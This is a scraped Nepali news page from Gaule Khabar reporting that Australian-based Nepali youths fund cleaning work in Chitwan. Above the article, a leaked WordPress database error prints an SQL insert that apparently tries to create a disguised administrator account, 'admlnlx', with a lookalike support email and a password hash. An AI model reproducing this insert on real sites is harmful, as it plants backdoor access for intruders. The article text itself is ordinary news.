WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhfaUH927.eHwzH24gfvUcb4pQJdNQ/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-18 01:16:06', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
अष्ट्रेलियाका युवाले गरे चितवनमा सफाइ – Gaule Khabar

अष्ट्रेलियाका युवाले गरे चितवनमा सफाइ

अष्ट्रेलियाका युवाले गरे चितवनमा सफाइ

सिड्नी ,माघ १४ –

हाल अष्ट्रेलियामा कार्यरत युवाहरुले नेपालको चितवन जिल्लाबाट सरसफाइको काम सुरु गरेका छन् । यो सरसफाइ अभियानमा गैरआवासीय नेपाली संघ अष्ट्रेलियाका कोषाध्यक्ष डिला खरेल पनि सहभागी भएका छन् ।

एक वर्ष अघिदेखि चितवनको भरतपुर विमानस्थलमा सरसफाइ गरेर सुरु भएको अभियानमा अहिले चितवन जिल्ला प्रशासन कार्यालयसम्म पुगेको छ । भरतपुर विमानस्थलमा कार्यरत सफाइ मजदुरलाई सिड्नीको खेम्स क्लिनिङमा कार्यरत नेपाली मजदुरहरुले अष्ट्रेलियामा गरेको आफ्नो कमाइको केही प्रतिशत छुट्याएर पारिश्रमिकको व्यवस्था गरिरहेका छन् ।

यसैगरी जिल्ला प्रशासन कार्यालयमा सरसफाइमा खट्ने मजदुरको आगामी एक वर्षको पारिश्रमिक गैरआवासीय नेपाली संघ अष्ट्रेलियाका कोषाध्यक्ष डिला खरेलले दिनेछन् ।

चितवनमा अष्ट्रेलियाका युवाहरुको अभियानमा नेपालबाट मातृभूमि नामक संस्था पनि जोडिएको छ । उक्त संस्थाले नेपालमै सहकार्य गर्नेछ भने अष्ट्रेलियामा इनोभेटिभ एशोसियट्सले सहकार्य सुरु गरेको छ । इनोभेटिभ एशोसियट्सले अष्ट्रेलियामा रहेका उद्यमीलाई नेपालमा रोजगारी सिर्जना गर्न र देशप्रतिको दायित्व पूरा गर्न अभियानमा सहभागी हुन आह्वान पनि गरेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका